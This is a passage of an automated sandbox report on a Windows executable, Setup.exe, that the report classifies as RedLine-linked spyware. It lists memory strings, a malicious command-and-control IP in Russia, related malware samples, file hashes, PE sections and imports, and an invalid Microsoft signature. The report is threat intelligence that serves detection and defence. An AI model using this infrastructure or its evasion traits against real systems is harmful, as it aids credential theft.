                                                                                                                  http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentityAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://search.yahoo.com?fr=crmas_sfpfAppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoorAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewAppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Entity/Id17ResponseAppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown

                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public IPs

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    94.142.138.4
                                                                                                                                                    		unknownRussian Federation
                                                                                                                                                    		35196IHOR-ASRUtrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:37.1.0 Beryl
                                                                                                                                                    Analysis ID:877006
                                                                                                                                                    Start date and time:2023-05-28 13:35:07 +02:00
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 6m 3s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:5
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample file name:Setup.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@2/1
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                                    HDC Information:
                                                                                                                                                    • Successful, ratio: 99.5% (good quality ratio 97.4%)
                                                                                                                                                    • Quality average: 82.9%
                                                                                                                                                    • Quality standard deviation: 23.3%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 96%
                                                                                                                                                    • Number of executed functions: 312
                                                                                                                                                    • Number of non-executed functions: 38
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Stop behavior analysis, all processes terminated

                                                                                                                                                    Warnings

                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31
                                                                                                                                                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
                                                                                                                                                    • Execution Graph export aborted for target AppLaunch.exe, PID 6868 because it is empty
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    13:36:17API Interceptor31x Sleep call for process: AppLaunch.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    94.142.138.4Discord_Tools.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                      Setup.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        SoftWare.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          Activator.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                            MilTLoader.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                              StormDEV.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                Setup.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                  Setup.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    mJNAiqCJ8i.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                      GW1u7Ax4Fu.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                        Ww8rdvUOAk.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                          0a25ac441bb2adabe39c3349c625f2fa673ba097747f5.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                            35d7bfaa55b73ca97da12fba7a06328783358576034ed.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                              3gcs852R7S.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                tHp33gimYz.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                    jrVH8C0uGi.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                      21063fbe8f41527df5613ed1fec86e81f25e7649ecee5.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                        m7YCXD6Q7B.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                          njMgxFYx5P.exeGet hashmaliciousAurora, RedLine, SmokeLoaderBrowse

                                                                                                                                                                                            Domains

                                                                                                                                                                                            No context

                                                                                                                                                                                            ASNs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            IHOR-ASRUDiscord_Tools.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 94.142.138.4
                                                                                                                                                                                            6OpAWsdPP8.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                            • 94.142.138.11
                                                                                                                                                                                            6RBdAzVC4t.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 94.142.138.186
                                                                                                                                                                                            file_resized.exeGet hashmaliciousAmadey, Fabookie, Nymaim, PrivateLoader, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                            • 94.142.138.131
                                                                                                                                                                                            SecuriteInfo.com.Variant.Lazy.346242.9201.25057.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 94.142.138.147
                                                                                                                                                                                            RMJIuVIE30.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                            • 94.142.138.116
                                                                                                                                                                                            SecuriteInfo.com.Variant.Fragtor.194921.4682.25666.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                            • 94.142.138.113
                                                                                                                                                                                            Setup.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                            • 94.142.138.113
                                                                                                                                                                                            Install.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                            • 94.142.138.113
                                                                                                                                                                                            Setup.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 94.142.138.4
                                                                                                                                                                                            Install.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                            • 94.142.138.113
                                                                                                                                                                                            oZIDuC0SMY.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLineBrowse
                                                                                                                                                                                            • 94.142.138.113
                                                                                                                                                                                            cWpIctYR45.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                            • 94.142.138.247
                                                                                                                                                                                            d2S7Q81Z0n.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                            • 94.142.138.246
                                                                                                                                                                                            InstallersOSIP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            • 94.142.138.146
                                                                                                                                                                                            file.exeGet hashmaliciousBlackGuardBrowse
                                                                                                                                                                                            • 94.142.138.111
                                                                                                                                                                                            file.exeGet hashmaliciousBlackGuardBrowse
                                                                                                                                                                                            • 94.142.138.111
                                                                                                                                                                                            DKbTwIYAJh.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                            • 94.142.138.247
                                                                                                                                                                                            UI721.bin.exeGet hashmaliciousAgentTesla, LockBit ransomware, LummaC Stealer, RedLine, TrojanRansom, zgRATBrowse
                                                                                                                                                                                            • 94.142.138.148
                                                                                                                                                                                            x8879wqTdC.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                                                                            • 94.142.138.247

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            No context

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2843
                                                                                                                                                                                            Entropy (8bit):5.3371553026862095
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKdHKBtBHK7HK5AHKzvQTHmtHoxHImHKoLHG1J:iqXeqm00YqhQnouOqdqxq7q2qzcGtIx+
                                                                                                                                                                                            MD5:325E4B0634C6C9578C7D7D8197BD5BCA
                                                                                                                                                                                            SHA1:1AD114002B0DDFF9C7C5175B0DA9E9FB40DD6BF0
                                                                                                                                                                                            SHA-256:1B4A2571C8CD6A81820D851AF94A52502BEE6E4802EF4ADBF77F9F1E20F26601
                                                                                                                                                                                            SHA-512:F03FC25705C318A8A26CD446B09A5FDD18EA8976854EECF26F7F02E9EF794C8A14711A556AA523DBC4FAFEA1377F1B46713554573C78A6471B490FE933751E52
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):7.461973899099257
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:Setup.exe
                                                                                                                                                                                            File size:359160
                                                                                                                                                                                            MD5:3694c18f01430f213aced163c75788a0
                                                                                                                                                                                            SHA1:25a1c807d62f211e6adb38ed07e96e6bd309f8b8
                                                                                                                                                                                            SHA256:7fdba125f3d682ea8b84cdc805f574789ebc8aecca3c5e20d20c8a8cd22e2bdb
                                                                                                                                                                                            SHA512:9f718f0ef0bb7c8d4e779a8e94ebf84600ccfb0896dc9e33718f4ef09a40434b4f98cde43dfa53781b40654209fcd9fcc4290b5bec58024a366d84f43ce478b2
                                                                                                                                                                                            SSDEEP:6144:yBmM2uzmMmVvV2KtLMMeWj286qoOEStQZ4lol3+uOD:KlzmRRYKtLMMx96NOESlK4zD
                                                                                                                                                                                            TLSH:0374E1113248C13AF4AB347189E9DA79A6B9B5701B6F60DBFBC41A6D4F313D17A3021B
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J)...Hk..Hk..Hk......Hk.....6Hk......Hk.)....Hk..G6..Hk..Hj..Hk..0...Hk......Hk..0...Hk.Rich.Hk.........................PE..L..

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x4070ab
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x64726F2F [Sat May 27 20:59:27 2023 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:ccf3d145fef27c23a1356d2673054011

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 5/12/2022 1:45:59 PM 5/11/2023 1:45:59 PM
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:EAF99B1CDFF361CB066EC1CDB5FD68ED
                                                                                                                                                                                            Thumbprint SHA-1:F372C27F6E052A6BE8BAB3112B465C692196CD6F
                                                                                                                                                                                            Thumbprint SHA-256:6DFB94C073BA075667FCC19AB327AE679D84F2A2BCF76CC21ABFC9B93FEE61A5
                                                                                                                                                                                            Serial:33000002CBB77539FB027142360000000002CB

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            call 00007FA65C6433A0h
                                                                                                                                                                                            jmp 00007FA65C63BA99h
                                                                                                                                                                                            cmp ecx, dword ptr [00454B30h]
                                                                                                                                                                                            jne 00007FA65C63BBF4h
                                                                                                                                                                                            rep ret
                                                                                                                                                                                            jmp 00007FA65C643422h
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                            mov eax, dword ptr [00454B30h]
                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                            ret
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                            mov eax, dword ptr [00454B30h]
                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                            push eax
                                                                                                                                                                                            mov dword ptr [ebp-10h], esp
                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                            ret
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                                            mov eax, dword ptr [00454B30h]
                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                            push eax
                                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                            ret
                                                                                                                                                                                            mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            pop edi
                                                                                                                                                                                            pop edi
                                                                                                                                                                                            pop esi
                                                                                                                                                                                            pop ebx

                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                            • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                            • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x28aec0x50.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x610.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x54c000x2ef8.data
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x272800x40.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x240000x220.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000x16d0f0x16e00False0.5724363900273224data6.631366328323876IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .ueXxN0x180000xbc1a0xbe00False0.4510896381578947data6.220063968239562IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0x240000x56ae0x5800False0.37113813920454547data5.257116704784325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0x2a0000x2db480x2bc00False0.9570368303571428data7.824578655735343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x580000x6100x800False0.33251953125data3.3303604724010856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                            Resources

                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                            RT_VERSION0x582000x410dataEnglishUnited States
                                                                                                                                                                                            RT_MANIFEST0x580a00x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                            Imports

                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            KERNEL32.dllGetLocaleInfoW, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetStringTypeW, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, IsValidCodePage, GetOEMCP, GetACP, HeapSize, CloseHandle, CreateFileA, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, GetStartupInfoA, GetFileType, SetHandleCount, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, WriteFile, ExitProcess, HeapReAlloc, VirtualAlloc, VirtualFree, HeapCreate, GetEnvironmentStringsW, MultiByteToWideChar, GetModuleHandleA, SetFilePointer, GetProcAddress, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, Sleep, InterlockedExchange, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, GetLastError, HeapFree, GetCommandLineA, LCMapStringA, LCMapStringW, GetCPInfo, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapAlloc
